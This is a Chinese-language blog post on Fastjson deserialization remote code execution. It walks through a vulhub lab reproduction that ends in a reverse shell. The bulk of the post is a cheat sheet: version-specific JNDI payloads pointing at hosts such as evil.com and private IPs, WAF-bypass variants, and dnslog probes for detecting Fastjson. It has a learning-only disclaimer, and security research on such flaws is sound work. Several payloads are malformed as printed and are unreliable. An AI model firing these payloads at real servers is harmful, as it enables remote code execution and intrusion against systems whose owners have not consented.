fastjson远程代码执行漏洞

免责声明:

本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

Fastjson 1.2.24 远程代码执行漏洞

漏洞说明

FastJson库是Java的一个Json库,其作用是将Java对象转换成json数据来表示,也可以将json数据转换成Java对象。在2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。

前提条件

开启autotype

影响范围

  • fastjson 1.2.22-1.2.24
  • jdk 1.7,1.8版本

漏洞复现

由于Fastjson 提供了反序列化功能,允许用户在输入 JSON 串时通过 “@type” 键对应的 value 指定任意反序列化类名,在数据传输时会默认调用该对象的setter\getter方法,利用JdbcRowSetImpl类,该类在setAutoCommit函数中会对成员变量dataSourceName进行lookup,导致JNDI注入的产生。

payload:

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://127.0.0.1:1099/jfzn6t",
        "autoCommit":true
    }
}
  • @type:目标反序列化类名;
  • dataSourceName:恶意远程类;
  • autoCommit:调用setAutoCommit方法。

1.使用vulhub开启靶场
在这里插入图片描述

使用post发包,Content-Type设置为application/json
在这里插入图片描述
起一个JNDI服务和NC反弹监听,等待shell反弹回来
在这里插入图片描述
成功反弹回shell。
在这里插入图片描述

Fastjson<=1.2.47 远程代码执行漏洞

在1.2.24后面的几个版本,fastjson了设置了autoTypeSupport属性默认为false。并且增加了checkAutoType()函数,通过黑白名单的方式来防御Fastjson反序列化漏洞,

利用poc:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}

在这里插入图片描述

Fastjson各个版本的一些POC

version<1.2.51 远程命令执行 1.2.24 
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}未知版本(1.2.24-41之间) 
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.41 
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.42 
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};

1.2.43 
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}

1.2.45 
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}

1.2.47 
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}

fastjson<=1.2.62
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://x.x.x.x:9999/exploit"}";

fastjson<=1.2.66
注意:autoTypeSupport属性为true才能使用,(fastjson>=1.2.25默认为false{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1389/Calc"}}

#其他利用
{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"JNDI_SERVER"}

{"@type":"ch.qos.logback.core.db.JNDIConnectionSource","jndiLocation":"JNDI_SERVER"}

{"@type":"org.apache.openjpa.ee.JNDIManagedRuntime","transactionManagerName":"JNDI_SERVER","rollbackOnly":null}

{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"JNDI_SERVER","rollbackOnly":null}

{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"JNDI_SERVER"}

{"@type":"org.apache.commons.configuration2.JNDIConfiguration","prefix":"JNDI_SERVER"}

{"@type":"oracle.jdbc.rowset.OracleJDBCRowSet","dataSourceName":"JNDI_SERVER","command":"test"}

绕waf小技巧

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit",""autoCommit":true}
{"@type":"LLcom.sun.rowset.RowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.42
{"@type":"[com.sun.rowset.RowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.25v1.2.43
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties""data_source":"rmi://localhost:1099/Exploit"}} 1.2.25
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://127.0.0.1:1099/Exploit\"}1.2.60
{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.60
{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.61
{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"rmi://localhost:1099/Exploit\"}  1.2.62
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\":{\"UserTransaction\":\"rmi://localhost:1099/Exploit\"}} JtaTransactionConfig

探测是否存在fastjson

回显报错

不闭合花括号使其报错,报错中可能会有fastjson的字样
在这里插入图片描述

使用dnslog探测

{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://dnslog"}}""}
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}
Set[{"@type":"java.net.URL","val":"http://dnslog"}]
Set[{"@type":"java.net.URL","val":"http://dnslog"}
{{"@type":"java.net.URL","val":"http://dnslog"}:0

参考:
https://github.com/ianxtianxt/Fastjson-1.2.47-rce
https://xz.aliyun.com/t/7568
http://www.lmxspace.com/2019/06/29/FastJson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/#fastjson-1-22-1-24
https://github.com/welk1n/FastjsonPocs
https://xz.aliyun.com/t/10041#toc-5

posted @ 2022-11-15 20:38  知冰  阅读(489)  评论(0编辑  收藏  举报